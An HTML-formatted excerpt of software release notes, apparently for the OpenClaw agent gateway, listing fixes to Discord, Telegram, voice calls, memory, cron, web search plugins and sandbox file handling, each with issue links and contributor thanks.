<li>Providers/OpenAI: resolve <code>keychain:&lt;service&gt;:&lt;account&gt;</code> <code>OPENAI_API_KEY</code> refs before creating OpenAI Realtime browser sessions or voice bridges, with a bounded cached Keychain lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330678787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72120/hovercard" href="https://github.com/openclaw/openclaw/issues/72120">#72120</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a>.</li>
<li>Discord/gateway: reconnect when the gateway socket closes while waiting for the shared IDENTIFY concurrency window, instead of silently skipping IDENTIFY and leaving the bot online but unresponsive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353606299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74617/hovercard" href="https://github.com/openclaw/openclaw/issues/74617">#74617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeeskdr-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeeskdr-ai">@zeeskdr-ai</a>.</li>
<li>Voice Call: add <code>sessionScope: "per-call"</code> for fresh per-call agent memory while preserving the default per-phone caller history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072126400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45280/hovercard" href="https://github.com/openclaw/openclaw/issues/45280">#45280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pondcountry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pondcountry">@pondcountry</a>.</li>
<li>Music generation: raise too-small tool timeouts to the provider-safe 10-second floor and collapse cascading abort fallback errors into a clearer root-cause summary. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Memory-core/dreaming: include the primary runtime workspace in multi-agent dreaming sweeps without mixing main-agent session transcripts into configured subagent workspaces. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307075727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70014/hovercard" href="https://github.com/openclaw/openclaw/issues/70014">#70014</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttomiczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttomiczek">@ttomiczek</a>.</li>
<li>Control UI: add tab/RPC timing attribution and decouple slow Overview/Cron secondary refreshes so Sessions navigation gets immediate visible feedback. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235854543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64004" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64004/hovercard" href="https://github.com/openclaw/openclaw/issues/64004">#64004</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WaMaSeDu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WaMaSeDu">@WaMaSeDu</a>.</li>
<li>Memory: retry transient SQLite index file swaps during atomic reindex on Windows, so brief <code>EBUSY</code>, <code>EPERM</code>, or <code>EACCES</code> locks do not fail memory rebuilds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237587612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64187" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64187/hovercard" href="https://github.com/openclaw/openclaw/issues/64187">#64187</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kunpeng-ai-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kunpeng-ai-lab">@kunpeng-ai-lab</a>.</li>
<li>Telegram/startup/models: use the existing <code>getMe</code> request guard and higher <code>timeoutSeconds</code> configs for slow Bot API paths, and make model picker confirmations say selections are session-scoped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366123141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75783/hovercard" href="https://github.com/openclaw/openclaw/issues/75783">#75783</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368057405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75965" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75965/hovercard" href="https://github.com/openclaw/openclaw/issues/75965">#75965</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tankotan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tankotan">@tankotan</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sd1114820/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sd1114820">@sd1114820</a>.</li>
<li>Control UI/slash commands: keep fallback command metadata on a browser-safe registry path, so provider thinking runtime imports cannot blank the Web UI with <code>process is not defined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368284321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75987" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75987/hovercard" href="https://github.com/openclaw/openclaw/issues/75987">#75987</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/novkien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/novkien">@novkien</a>.</li>
<li>Heartbeat/Discord: keep async exec completion events out of the generic <code>System (untrusted)</code> prompt block and let the dedicated exec heartbeat prompt handle them, so Discord no longer receives raw exec failure tails as separate system-style messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259713936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66366" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66366/hovercard" href="https://github.com/openclaw/openclaw/issues/66366">#66366</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Promee-ThaBossHoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Promee-ThaBossHoss">@Promee-ThaBossHoss</a>.</li>
<li>Heartbeat/scheduler: make heartbeat phase scheduling active-hours-aware so the scheduler seeks forward to the first in-window phase slot instead of arming timers for quiet-hours slots and relying solely on the runtime guard. Non-UTC <code>activeHours.timezone</code> values (e.g. <code>Asia/Shanghai</code>) now correctly influence when the next heartbeat timer fires, avoiding wasted quiet-hours ticks and long dormant gaps after gateway restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363246759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75487/hovercard" href="https://github.com/openclaw/openclaw/issues/75487">#75487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Channels: strip plain-text MiniMax and XML tool-call scaffolding from shared user-facing reply sanitization, so messaging channels do not deliver raw model tool syntax when a provider emits it as text instead of structured tool calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221535812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62820/hovercard" href="https://github.com/openclaw/openclaw/issues/62820">#62820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</li>
<li>Infer/media: report missing image-understanding and audio-transcription provider configuration for <code>image describe</code>, <code>image describe-many</code>, and <code>audio transcribe</code> instead of blaming the input path when no provider is available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343347839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73569" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73569/hovercard" href="https://github.com/openclaw/openclaw/issues/73569">#73569</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73593/hovercard" href="https://github.com/openclaw/openclaw/pull/73593">#73593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349938490" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74288/hovercard" href="https://github.com/openclaw/openclaw/pull/74288">#74288</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352412851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74495/hovercard" href="https://github.com/openclaw/openclaw/pull/74495">#74495</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmimmanuel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmimmanuel">@tmimmanuel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>CLI/infer: reject local <code>codex/*</code> one-shot model probes before simple-completion dispatch and point operators at the Codex app-server runtime path instead of ending with an empty-output error.</li>
<li>Docs/health: clarify that session listing surfaces stored conversation rows rather than Discord/channel socket liveness, and point connectivity checks at channel status and health probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312712740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70420/hovercard" href="https://github.com/openclaw/openclaw/issues/70420">#70420</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ashersoutherncities-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ashersoutherncities-art">@ashersoutherncities-art</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>WhatsApp/Cron: keep DM pairing-store approvals out of implicit cron and heartbeat recipient fallback, so scheduled automation only uses explicit targets, active configured recipients, or configured <code>allowFrom</code> entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215965103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62339/hovercard" href="https://github.com/openclaw/openclaw/issues/62339">#62339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kelvinisly-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kelvinisly-collab">@kelvinisly-collab</a>.</li>
<li>Google Meet: keep the agent-facing <code>google_meet</code> tool visible on non-macOS hosts but block local Chrome realtime actions with guidance, so Linux agents can still use transcribe, Twilio, chrome-node, and artifact flows without choosing the macOS-only BlackHole path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367913692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75950/hovercard" href="https://github.com/openclaw/openclaw/issues/75950">#75950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/actual-software-inc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/actual-software-inc">@actual-software-inc</a>.</li>
<li>macOS/settings: keep opening General from rewriting <code>openclaw.json</code> during Tailscale settings hydration, preserving <code>gateway</code>, <code>auth</code>, <code>meta</code>, and <code>wizard</code> until the user changes a setting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192663996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59545" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59545/hovercard" href="https://github.com/openclaw/openclaw/issues/59545">#59545</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tengdw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tengdw">@Tengdw</a>.</li>
<li>Discord: prioritize interaction callbacks ahead of stale background REST work without polling active REST buckets, validate oversized gateway payloads and member-intent requests before send, and forward explicit component payloads from message actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362439940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75363" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75363/hovercard" href="https://github.com/openclaw/openclaw/pull/75363">#75363</a>)</li>
<li>Active Memory: use the configured recall timeout as the blocking prompt-build hook budget by default and move cold-start setup grace behind explicit <code>setupGraceTimeoutMs</code> config, so the plugin no longer silently extends 15000 ms configs to 45000 ms on the main lane. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367042978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75843" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75843/hovercard" href="https://github.com/openclaw/openclaw/issues/75843">#75843</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</li>
<li>Plugins/web-provider: reuse the active gateway plugin registry for runtime web provider resolution after deriving the same candidate plugin ids as the loader path, avoiding a redundant <code>loadOpenClawPlugins</code> call on every request while preserving origin and scope filters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363428779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75513/hovercard" href="https://github.com/openclaw/openclaw/issues/75513">#75513</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jochen">@jochen</a>.</li>
<li>Crestodian/CLI: exit non-zero when interactive Crestodian is invoked without a TTY, so scripts and CI no longer treat the setup error as success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344381793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73646/hovercard" href="https://github.com/openclaw/openclaw/issues/73646">#73646</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347317157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73928" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73928/hovercard" href="https://github.com/openclaw/openclaw/pull/73928">#73928</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347801211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74059/hovercard" href="https://github.com/openclaw/openclaw/pull/74059">#74059</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</li>
<li>Cron: keep implicit/default isolated cron announce deliveries out of the main session awareness queue, so isolated jobs do not accumulate in the main conversation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208027555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61426/hovercard" href="https://github.com/openclaw/openclaw/issues/61426">#61426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lihannon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lihannon">@Lihannon</a>.</li>
<li>Subagents: avoid duplicate parent-visible replies when a parent uses <code>sessions_send</code> on its own persistent native subagent session, while preserving announce delivery for async sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342979045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73550/hovercard" href="https://github.com/openclaw/openclaw/issues/73550">#73550</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sylviazhang2006-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sylviazhang2006-design">@sylviazhang2006-design</a>.</li>
<li>Web search/Brave: add opt-in <code>brave.http</code> diagnostics for Brave request URLs/query params, response status/timing, and cache hit/miss/write events without logging API keys or response bodies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144203570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55196/hovercard" href="https://github.com/openclaw/openclaw/issues/55196">#55196</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mecampbellsoup/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mecampbellsoup">@mecampbellsoup</a>.</li>
<li>Web search/Brave: add <code>plugins.entries.brave.config.webSearch.baseUrl</code> for Brave-compatible proxies, including endpoint-aware cache keys for both web and LLM Context modes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3951923414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/19075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/19075/hovercard" href="https://github.com/openclaw/openclaw/issues/19075">#19075</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkoprax/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkoprax">@jkoprax</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishnukool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishnukool">@vishnukool</a>.</li>
<li>Web search/config: validate explicit <code>tools.web.search.provider</code> values against bundled and installed plugin manifests, while warning for stale third-party plugin config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123070790" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53092/hovercard" href="https://github.com/openclaw/openclaw/issues/53092">#53092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</li>
<li>Web search/SearXNG: retry empty non-general category searches once with the general category, so unsupported category engines do not return empty results when general search has matches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343014523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73552/hovercard" href="https://github.com/openclaw/openclaw/issues/73552">#73552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loukky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loukky">@Loukky</a>.</li>
<li>CLI/message: skip gateway-stop hooks for read-only <code>message read</code> and bound stop-hook shutdown for other message actions, so one-shot Discord reads cannot hang behind plugin lifecycle cleanup.</li>
<li>Plugins/web-provider: cache repeated bundled web search and web fetch provider registry loads by default while preserving explicit cache opt-outs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368302945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75992/hovercard" href="https://github.com/openclaw/openclaw/pull/75992">#75992</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</li>
<li>Agents/sandbox: preserve existing workspace file modes when sandbox edits atomically replace files, so 0644 files do not collapse to 0600 after Write/Edit/apply_patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4064748597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44077" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44077/hovercard" href="https://github.com/openclaw/openclaw/issues/44077">#44077</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/patosullivan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/patosullivan">@patosullivan</a>.</li>
<li>Control UI/WebChat: route typed <code>/new</code> through the New Chat dashboard-session creation flow instead of <code>chat.send</code>, while keeping <code>/reset</code> as the explicit current-session reset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300356598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69599/hovercard" href="https://github.com/openclaw/openclaw/issues/69599">#69599</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Agents/models: keep legacy CLI runtime model refs such as <code>claude-cli/*</code> in the configured allowlist after canonical runtime migration, so cron <code>payload.model</code> overrides keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365669096" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75753/hovercard" href="https://github.com/openclaw/openclaw/issues/75753">#75753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</li>
<li>Codex/app-server: restart the shared Codex app-server client once when it closes during startup thread resume, preserving the existing thread binding instead of retrying <code>thread/start</code> on a closed client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/watch: keep colored subsystem log prefixes in the managed tmux pane even when the parent shell exports <code>NO_COLOR</code>, while preserving explicit <code>FORCE_COLOR=0</code> opt-out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/compaction: submit a non-empty runtime-event marker for pre-compaction memory flush turns, so strict Anthropic providers no longer reject the silent flush as an empty user message. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361911066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75305/hovercard" href="https://github.com/openclaw/openclaw/issues/75305">#75305</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sableassistant3777-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sableassistant3777-source">@sableassistant3777-source</a>.</li>
<li>Plugin SDK: re-export <code>isPrivateIpAddress</code> from <code>plugin-sdk/ssrf-runtime</code>, restoring source-checkout builds for SearXNG and Firecrawl private-network guards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/message actions: advertise <code>upload-file</code> and route it through Discord's send runtime with agent-scoped media reads, so agents can discover and send file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203171087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60652/hovercard" href="https://github.com/openclaw/openclaw/issues/60652">#60652</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204560464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60808" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60808/hovercard" href="https://github.com/openclaw/openclaw/pull/60808">#60808</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206054244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61087" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61087/hovercard" href="https://github.com/openclaw/openclaw/pull/61087">#61087</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206088150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61100" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61100/hovercard" href="https://github.com/openclaw/openclaw/pull/61100">#61100</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claw-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claw-io">@claw-io</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelnishanth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelnishanth">@joelnishanth</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjhddh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjhddh">@sjhddh</a>.</li>
<li>Sessions: suppress exact inter-session control replies such as <code>NO_REPLY</code> and keep agent-to-agent announce bookkeeping out of visible transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123622416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53145" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53145/hovercard" href="https://github.com/openclaw/openclaw/issues/53145">#53145</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TarahAssistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TarahAssistant">@TarahAssistant</a>.</li>
